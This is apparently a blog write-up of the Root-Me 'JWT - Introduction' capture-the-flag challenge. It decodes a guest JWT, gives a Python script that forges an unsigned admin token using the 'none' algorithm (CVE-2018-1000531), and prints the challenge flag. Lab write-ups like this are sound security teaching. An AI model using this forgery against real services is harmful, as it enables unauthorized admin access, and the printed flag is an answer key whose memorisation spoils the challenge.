Post

JWT - Introduction

Posted
By thanguyen165 1 min read

Statement

To validate the challenge, connect as admin.

Analyzation

First look, we have a login form. There is a line Login as guest. Click on it and there will be a guest’s page.

Check the cookie, there is a new cookie added

1

jwt: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0In0.OnuZnYMdetcg7AWGV6WURn8CFSfas6AQej4V9M13nsk

Decode it by jwt.io

HEADER

1
2
3
4

{
  "typ": "JWT",
  "alg": "HS256"
}

PAYLOAD

1
2
3

{
  "username": "guest"
}

Solution

Change the alg to None, and change username to admin. Check CVE-2018-1000531.

1
2
3
4
5
6
7
8
9

import requests, jwt

URL = "http://challenge01.root-me.org/web-serveur/ch58/index.php"

encoded_jwt = jwt.encode({"username": "admin"}, key=None, algorithm="none")

response = requests.get(URL, cookies={"jwt": encoded_jwt})

print(response.text)

The flag is

1

S1gn4tuR3_v3r1f1c4t10N_1S_1MP0Rt4n7
Practice, rootme
Web Exploitation JWT attacks
This post is licensed under CC BY 4.0 by the author.